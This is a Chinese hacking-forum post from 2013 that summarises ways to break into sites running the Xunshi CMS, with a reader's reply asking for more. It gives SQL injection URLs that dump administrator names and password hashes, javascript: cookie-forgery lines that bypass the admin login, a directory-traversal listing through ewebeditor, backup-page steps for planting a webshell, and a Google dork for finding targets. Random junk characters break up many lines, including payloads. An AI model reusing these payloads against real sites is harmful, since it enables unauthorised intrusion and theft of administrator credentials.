找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2576|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
  `7 o# V7 P$ D7 O6 F6 H" r  x
. M6 }9 C, d& |2 A+ z在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)) _1 J- d0 H; W/ U6 R- _

( Q' g5 S2 m( l以下本文总结来自黑防去年第9期杂志上的内容...# i5 @1 X( ]5 b

3 N1 F) X/ i' a% _5 \, y/ ~先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%2 M5 a) S8 d& n% i! x
3 W9 Q2 \& a% q9 i8 o: V
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
, o) |0 s4 i$ }) z+ O: l
! k0 x7 G' [0 p记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况( [8 @9 R) Y4 j" b9 W
这里一个注入
6 y0 Z9 S: y0 y2 H$ I. v; o
6 n3 y) A5 o5 |* a6 W' E( I0 r效果如图:
& l! X# A+ _! H% @. n0 l$ V7 O7 @" d! J8 o2 @

5 ]: V; m) V# o7 w2 @0 @9 G$ [
6 C$ V  S7 I: N; x' C; R/ q这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
2 \: ~' ?. @. O5 }3 r! ]8 c6 P4 z& L
2 B/ A9 ^( o( x: N密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去' _' U, L( A% X0 r/ A/ V: H

: R1 M6 F9 M2 A3 j* K# hjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));: W4 d7 W3 t& O. R
$ ^9 t, R  T$ A, a& N) r0 o# j: {
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:* B7 Q$ n* d" N2 o9 A- s7 [
* _# z! ]: f; Z( M0 D
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
# S: f7 G# D; G! V2 w
/ X1 r* @# K. v- i2 ?5 r* A它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以- ^9 h* C* o( n& A. v

* N% ?2 F$ C7 I访问这页面来列目录..步骤如下:
# C( u- [% k. d: _7 V
* }5 ]/ M% M( d' k  r: Hjavascript:alert(document.cookie="admindj=1") 9 N9 r  ^: U1 i& [" ?

5 @- z; q! l$ ]7 c6 ?http://www.political-security.co ... asp?id=46&dir=../..
: D6 u! H1 h$ n7 ?1 p' I' ~7 \& C" k7 w4 W$ x3 G9 @7 H1 N. O0 T8 d; ]
效果如图:
$ W  ]- f2 ?- h
4 w, L4 f/ x' {8 I9 O9 a1 _
4 g8 k9 d; B2 a* S* S: \; j) R# c) u& q
这样全站目录都能瞧了..找到后台目录..进去..9 d. O. F, B8 ^! t4 g& C) j
/ ~% M0 ^3 I3 m/ ^
那么进了后台怎么拿shell??上传--备份就ok了..
% R* F2 J9 a7 T4 l7 E9 V% ~- S
% S) L& w1 V0 B2 Q0 ~那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..' }! l* _3 t6 T% \
1 W% ~3 v. F2 x; i0 w
这个我也碰到过一次..你都可以通过列目录来实现..
; n4 `, K" {1 D) m  s
% k: @7 m. H: j3 Tjavascript:alert(document.cookie="admindj=1")
1 }* r6 \% m) C' L0 T- C
: U' w: a3 Z6 K) W) Phttp://www.political-security.co ... p?action=BackupData ( j/ S) W0 e4 Q1 C: {8 j  j

( r, i0 f" ]5 a; l, }2 ], N备份ok..1 f& F. X* B' Z" I4 F' @

: S* a# Z4 c/ G' [6 j: d那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
& X4 U2 T, [: @3 ]' ?3 p( d+ X8 K. a
. a7 e- M+ s. w0 z在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下/ d( K3 ^# `; B2 |

5 X: o0 L9 s5 a' g: n0 g" `& S然后访问此页面进行注入..步骤如下:" k2 z/ r; ]- i7 [9 y8 r
% A5 q1 j5 f" J+ d: d
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
! `- P7 w+ A! p" D. `% x* w
- P" z* y' b: `然后请求admin/admin_chk.asp页面3 d( v! l' h" l
- G5 C! j; p6 _1 n2 ^! A( S, l
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
1 O6 {: n' @! W: Z) A. n2 d  A: @1 u, z" |2 P9 g$ {4 n' Q8 t8 W
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin9 w, ?+ P4 R+ [5 U7 w; m
- X! l8 c. |3 \" f3 B
效果如图所示:
6 N) b, x# _. d" b
0 |2 P0 I; ]9 j
  v: }8 P3 M" s7 |3 J) a3 a+ `( a# X$ V
讯时漏洞28 t6 O, W9 D/ e. n8 v9 h' D' ?
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧), Z" u1 W8 o( A& G- p' X7 [# G

! y9 e7 ?" r( M" h1、/admin/admin_news_pl_view.asp?id=1  ^4 H" b' c( D; y; X- W
//id任意 填入以下语句
* e6 f; p  }; p# E( | % l4 {1 c# I, N" p% W! u" z
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
! i" [& B8 h* q# _1 ]+ V7 f- k
2 ^, z5 g$ F( _, u6 \. T3 k+ l
7 u8 ?# o( ~) P4 v1 _2 I) q7 T8 v0 W$ \( g' f
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='7 n9 Y9 w- a0 c* I! k7 m

. K7 v! n( H) P4 Y% n* b# E; Z
  |+ e( U8 `# b# m. n: B: t& j& G) m
! Q  o2 Z' i  O- F( n爆出管理员帐号和密码了
6 B& n, ^8 ]2 }5 Z1 A" H
' h6 Y6 b2 \1 B; p) Q
4 E0 x( k" S( i' O8 Z, w" i6 B9 S0 L6 H; h* |- v; H/ l
4、cookies进后台
7 a7 U0 L: h- \4 a# W
% R0 W# u) s# Y6 r! ~2 A4 W! Ojavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));5 v! b% X8 \5 }( T7 [: m( o
9 L4 E1 [% u; n# _- L3 ?8 p2 ^

9 T* `1 K; u- D; K# y4 f0 @" _9 n" h5 D
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
: P, l. J/ {# B6 |3 Q $ l7 Y. [, J9 t: y) ~; N5 K$ H6 b3 {
+ P: J/ P* Y. h! s) {" N0 h

. R) a. d9 J3 }0 y6、后台有上传和备份取SHELL不难。
. {5 E) A7 m7 Y" K
8 q" I3 M2 e; N; Y* \7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..6 k. H. h; P) n* c+ P
+ e; W! [" T- A' h( E
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
  d/ [+ S2 A: p5 `: C5 E+ U+ M' }. f* B- ^/ V

& m* [1 X/ [) r9 ^
6 y. l& @# A* u8 [0 o) C, ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表